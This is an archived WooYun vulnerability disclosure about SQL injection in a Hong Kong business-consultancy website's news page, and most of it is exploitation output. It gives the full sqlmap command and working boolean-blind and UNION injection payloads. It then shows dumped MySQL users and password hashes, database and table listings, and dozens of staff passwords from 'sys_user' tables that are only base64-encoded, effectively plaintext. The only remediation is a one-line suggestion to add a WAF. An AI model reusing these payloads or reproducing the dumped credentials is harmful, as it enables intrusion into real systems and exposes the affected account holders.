乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经确认,细节仅向厂商公开 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
普斯匯達顧問有限公司是普斯集團旗下的成員,公司主營服務有:生意轉讓、特許經營、收購合併、創業培訓課程、創業顧問服務、市場策劃、品牌形象策劃。我們致力發展成為一個高效率的商業平臺,竭誠為客戶提供優質的服務。 普斯匯達顧問有限公司擁有專業的商業顧問,包括專業會計師、核數師及律師,對生意業務轉讓的交易過程及細節均擁有豐富經驗,於交易前後提供大量免費的專業意見及支援服務,由尋找買家或賣家、為生意估值至雙方完成交易,協助顧客成功實踐創業夢想。「普斯匯達」快捷可靠的服務及專業團隊精神協助買賣雙方磋商洽談,確保交易過程中每個階段,以及其後的整合或交接計劃均能順利完成,並確保交易過程絕對保密。
地址:http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=
$ python sqlmap.py -u "http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=" -p id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
Database: dbh232120+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| tbl_email_opportunities | 32076 |Database: dbh232120Table: tbl_email_opportunities[33 columns]+------------------+--------------+| Column | Type |+------------------+--------------+| active | tinyint(4) || address2 | varchar(200) || agreement | tinyint(1) || asking_price | varchar(20) || Assets | text || b_item | int(11) || code | varchar(255) || create_by | bigint(20) || create_date | datetime || deleted | tinyint(4) || desc_1 | text || desc_2 | text || desc_3 | text || Followed1_By | bigint(20) || hot_item | int(11) || id | bigint(20) || Internal_Remarks | text || intro_1 | varchar(255) || intro_2 | varchar(255) || intro_3 | varchar(255) || investment | double || investment_desc | varchar(30) || marked | tinyint(4) || modify_by | bigint(20) || modify_date | datetime || new_item | int(11) || ranking | char(1) || shop_company | varchar(100) || sold | tinyint(1) || status | tinyint(4) || whether1 | tinyint(1) || whether2 | tinyint(1) || whether3 | tinyint(1) |+------------------+--------------+
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87 AND 8143=8143&pg_num=&search_key= Type: UNION query Title: MySQL UNION query (58) - 14 columns Payload: id=-5811 UNION ALL SELECT 58,58,58,58,CONCAT(0x7178627171,0x554c625470547a786d765441444a6b51556d514379614d54734d665768666d457344766d6b764373,0x7170707871),58,58,58,58,58,58,58,58,58#&pg_num=&search_key=---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL >= 5.0.0current user: 'h232120b@localhost'current user is DBA: Falsedatabase management system users [5]:[*] 'h232120b'@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'root'@'localhost.localdomain'[*] 'trde'@'localhost'database management system users password hashes:[*] h232120b [1]: password hash: *72D7917DEF41D910F80CD9FE98BEFE5A32A0FED8[*] root [2]: password hash: *EE3ECFB89BBCBE7790487A144F06F247C1CF6153 password hash: NULL[*] trde [1]: password hash: *A894E636161F8EB03FE9E80749B297776CC0329EDatabase: mysql+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| help_relation | 993 || help_topic | 506 || help_keyword | 452 || help_category | 38 || `user` | 5 || db | 4 |+-----------------------------------------+---------+Database: dbh232120+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| tbl_email_opportunities | 32076 || tbl_customer_opp_match | 26837 || tbl_email_business_transfer | 20227 || tbl_business_transfer_item | 19273 || log_browse | 17573 || tbl_opportunities_mail_user_franchise | 15682 || tbl_opportunities_mail_user | 12602 || tbl_business_transfer | 9063 || tbl_opportunities_photo | 7588 || tbl_general_mail_user | 6470 || tbl_select | 4506 || sys_function_right | 3980 || tbl_opportunities | 2701 || tbl_opportunities_4 | 2601 || tbl_business_transfer_1 | 1972 || tbl_opportunities_2 | 1657 || tbl_opportunities_6 | 1415 || tbl_customer_exclusive_salesman | 1141 || tbl_opportunities_5 | 485 || tbl_billing | 300 || tbl_news_press | 279 || tbl_def_location | 239 || tbl_def_region | 239 || sys_user_group_right | 167 || tbl_opportunities_3 | 143 || tbl_invoice | 134 || tbl_opportunities_read_user | 123 || tbl_invoice_upload | 102 || tbl_opportunities_franchise_follow_user | 86 || tbl_location | 69 || sys_user | 68 || tbl_opportunities_franchise | 55 || tbl_leave | 54 || sys_function | 39 || tbl_mailsetting | 28 || tbl_business_nature | 15 || maid_member | 12 || sys_user_group | 12 || tbl_franchise_photo | 11 || tbl_online | 11 || tbl_category2 | 10 || tbl_category1 | 9 || tbl_category3 | 9 || tbl_opportunities_franchise_photo | 7 || tbl_successful_case | 7 || sys_function_group | 6 || tbl_hd_setting | 6 || tbl_advertinfo | 5 || tbl_franchise | 4 || tbl_discount | 3 || sys_file_management | 2 || tbl_def_container | 2 || tbl_def_packaging | 2 || tbl_company_ip | 1 || tbl_customer_opp_match_time | 1 || tbl_email | 1 || tbl_setting | 1 |+-----------------------------------------+---------+Database: tradeasy+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| tbl_email_opportunities | 30606 || tbl_customer_opp_match | 23109 || tbl_email_business_transfer | 18880 || tbl_business_transfer_item | 18065 || tbl_opportunities_mail_user_franchise | 14746 || tbl_opportunities_mail_user | 12218 || log_browse | 12015 || tbl_business_transfer | 8627 || tbl_opportunities_photo | 6610 || tbl_general_mail_user | 6150 || tbl_select | 4331 || sys_function_right | 3976 || tbl_opportunities | 2599 || tbl_opportunities_4 | 2499 || tbl_business_transfer_1 | 1842 || tbl_opportunities_2 | 1556 || tbl_opportunities_6 | 1264 || tbl_customer_exclusive_salesman | 1092 || tbl_opportunities_5 | 414 || tbl_billing | 303 || tbl_news_press | 277 || tbl_def_location | 239 || tbl_def_region | 239 || sys_user_group_right | 167 || tbl_opportunities_3 | 142 || tbl_invoice | 123 || tbl_opportunities_read_user | 123 || tbl_invoice_upload | 93 || tbl_opportunities_franchise_follow_user | 76 || sys_user | 72 || tbl_location | 69 || tbl_leave | 57 || tbl_opportunities_franchise | 49 || sys_function | 40 || tbl_mailsetting | 26 || tbl_business_nature | 15 || maid_member | 12 || sys_user_group | 12 || tbl_franchise_photo | 11 || tbl_category2 | 10 || tbl_category1 | 9 || tbl_category3 | 9 || tbl_successful_case | 8 || tbl_b_item_send_email | 7 || tbl_opportunities_franchise_photo | 7 || sys_function_group | 6 || tbl_hd_setting | 6 || tbl_advertinfo | 5 || tbl_franchise | 4 || tbl_online | 4 || tbl_discount | 3 || sys_file_management | 2 || tbl_def_container | 2 || tbl_def_packaging | 2 || tbl_company_ip | 1 || tbl_customer_opp_match_time | 1 || tbl_email | 1 || tbl_setting | 1 |+-----------------------------------------+---------+Database: information_schema+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| COLUMNS | 4958 || STATISTICS | 297 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || PARTITIONS | 285 || TABLES | 285 || KEY_COLUMN_USAGE | 279 || GLOBAL_VARIABLES | 274 || SESSION_VARIABLES | 274 || TABLE_CONSTRAINTS | 258 || COLLATION_CHARACTER_SET_APPLICABILITY | 128 || COLLATIONS | 127 || USER_PRIVILEGES | 89 || SCHEMA_PRIVILEGES | 64 || CHARACTER_SETS | 36 || PLUGINS | 7 || SCHEMATA | 7 || ENGINES | 5 || PROCESSLIST | 1 |+-----------------------------------------+---------+Database: hkmortgage+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| sys_function_right | 3576 || tbl_mortgage_apply | 71 || tbl_hkm_type | 12 || sys_function | 9 || sys_user_group_right | 7 || sys_function_group | 5 || sys_user | 5 || sys_user_group | 3 || tbl_postion | 3 || tbl_sex | 2 || tbl_company_ip | 1 || tbl_email | 1 || tbl_settinga | 1 |+-----------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: hkmortgageTable: sys_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: dbh232120Table: sys_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: tradeasyTable: sys_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: 123Table: sys_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: mysqlTable: servers[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(64) |+----------+----------+Database: mysqlTable: user[3 entries]+-------------------------------------------+| Password |+-------------------------------------------+| *72D7917DEF41D910F80CD9FE98BEFE5A32A0FED8 || *A894E636161F8EB03FE9E80749B297776CC0329E || *EE3ECFB89BBCBE7790487A144F06F247C1CF6153 |+-------------------------------------------+Database: mysqlTable: servers[0 entries]+----------+| Password |+----------++----------+Database: dbh232120Table: sys_user[68 entries]+----------------------+| password |+----------------------+| aGsxMjM= || amgzMDE2OTk4NA== || aml1cG43OTA= || aml1cG43OTA= || aWM2MjExMTIxNQ== || b2N0b2JlcjE= || b2wzMDE2OTk4NA== || bG8wNzE= || bG9uZzAzMDQ= || bGV1bmcxMjM= || bHVvMTIz || bWsxMjM0NTYh || bWszMjQ3Mzg0Nw== || bWtfcmVzaWduZWQ= || bXlwZWdyZWI= || cGFwZXIxMjM= || cHRzYTAwMQ== || cmF5bW9uZDE4MA== || cmVzaWduMTM1Nzk= || cmVzaWduZWQxMjM= || d2FpOTEy || d2FpOTEy || d2FpOTEy || d2FpOTEy || d2FpOTEy || dGVybWluYXRlZDE3MDk= || dGVyOTEyOTE3 || dGVyZW5jZTk2NTc4MTQ0 || dGVzdGluZw== || dHkzMDE2OTk4NA== || MDY4MTA3NDE= || MjAxNTA5MTY= || MjE0MTMz || MjQ2ODAxaGs= || MTE0MTE1Li4= || MTIzNDU2 || MTIzNDU2 || MTk4NTExMDc= || MTk4ODAyMDc= || MTk5NDExMTI= || MTY4NjY4 || MzAxMzk3NTU= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzEwMTUwOTg= || MzEwNjk5ODQ= || NjMwMTE= || OTgyMTMyNjM= || OTMxODQwMTg= || QXNkZjEyMzQ= || Y29taWNz || Ym5pODY5OTE3MDk= || Ym5pODY5OTE3MDk= || Ym5pOTY1NzgxNDQ= || YW5keTAwMQ== || YW5keTg2OTkxNzA5 || YWMxMjM0 || YXNkZjEyMzQ= || ZGF2ZWJpa2U= || ZmlyZWQ4Njk5YXNkZg== || ZmlyZWQwNTMw || ZmlyZWQyMDEzMDYxOA== || ZmlyZWRvbjIwMTQwMTEz || ZW5lcmd5ODk= |+----------------------+Database: tradeasyTable: sys_user[72 entries]+----------------------+| password |+----------------------+| a3M4ODgy || aGsxMjM= || amgzMDE2OTk4NA== || aml1cG43OTA= || aml1cG43OTA= || aWM2MjExMTIxNQ== || b2N0b2JlcjE= || b2wzMDE2OTk4NA== || bG8wNzE= || bG9uZzAzMDQ= || bGV1bmcxMjM= || bHVvMTIz || bWs4Njk5MTcwOQ== || bWsxMjM0NTYh || bWszMjQ3Mzg0Nw== || bWtfcmVzaWduZWQ= || bXlwZWdyZWI= || cGFwZXIxMjM= || cHRzYTAwMQ== || cmF5bW9uZDE4MA== || cmVzaWduMTM1Nzk= || cmVzaWduZWQxMjM= || d2FpOTEy || d2FpOTEy || d2FpOTEy || d2FpOTEy || d2FpOTEy || dGVybWluYXRlZDE3MDk= || dGVyOTEyOTE3 || dGVyZW5jZTk2NTc4MTQ0 || dGVzdGluZw== || dHkzMDE2OTk4NA== || dnQxMjM0NTY= || MDY4MTA3NDE= || MjAxNTA5MTY= || MjE0MTMz || MjQ2ODAxaGs= || MTIzNDU2 || MTIzNDU2 || MTIzNDU2 || MTIzNDU2 || MTIzNDU2 || MTk4NTExMDc= || MTk4ODAyMDc= || MTk5NDExMTI= || MTY4NjY4 || MzAxMzk3NTU= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzAxNjk5ODQ= || MzEwMTUwOTg= || MzEwNjk5ODQ= || NjMwMTE= || OTgyMTMyNjM= || OTMxODQwMTg= || QXNkZjEyMzQ= || Y29taWNz || Ym5pODY5OTE3MDk= || Ym5pODY5OTE3MDk= || Ym5pODY5OTE3MDk= || Ym5pOTY1NzgxNDQ= || YW5keTAwMQ== || YW5keTg2OTkxNzA5 || YWMxMjM0 || YXNkZjEyMzQ= || ZmlyZWQ4Njk5YXNkZg== || ZmlyZWQwNTMw || ZmlyZWQyMDEzMDYxOA== || ZmlyZWRvbjIwMTQwMTEz || ZW5lcmd5ODk= |+----------------------+Database: 123Table: sys_user[0 entries]+----------+| password |+----------++----------+Database: hkmortgageTable: sys_user[5 entries]+------------------+| password |+------------------+| bWs4Njk5MTcwOQ== || c2E= || MTIzNDU2 || MTIzNDU2 || NjU0MzIxLi4h |+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87 AND 8143=8143&pg_num=&search_key= Type: UNION query Title: MySQL UNION query (58) - 14 columns Payload: id=-5811 UNION ALL SELECT 58,58,58,58,CONCAT(0x7178627171,0x554c625470547a786d765441444a6b51556d514379614d54734d665768666d457344766d6b764373,0x7170707871),58,58,58,58,58,58,58,58,58#&pg_num=&search_key=---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: dbh232120Table: tbl_email_opportunities[33 columns]+------------------+--------------+| Column | Type |+------------------+--------------+| active | tinyint(4) || address2 | varchar(200) || agreement | tinyint(1) || asking_price | varchar(20) || Assets | text || b_item | int(11) || code | varchar(255) || create_by | bigint(20) || create_date | datetime || deleted | tinyint(4) || desc_1 | text || desc_2 | text || desc_3 | text || Followed1_By | bigint(20) || hot_item | int(11) || id | bigint(20) || Internal_Remarks | text || intro_1 | varchar(255) || intro_2 | varchar(255) || intro_3 | varchar(255) || investment | double || investment_desc | varchar(30) || marked | tinyint(4) || modify_by | bigint(20) || modify_date | datetime || new_item | int(11) || ranking | char(1) || shop_company | varchar(100) || sold | tinyint(1) || status | tinyint(4) || whether1 | tinyint(1) || whether2 | tinyint(1) || whether3 | tinyint(1) |+------------------+--------------+
上WAF。
危害等级:中
漏洞Rank:5
确认时间:2015-11-30 14:44
Referred to related parties.
暂无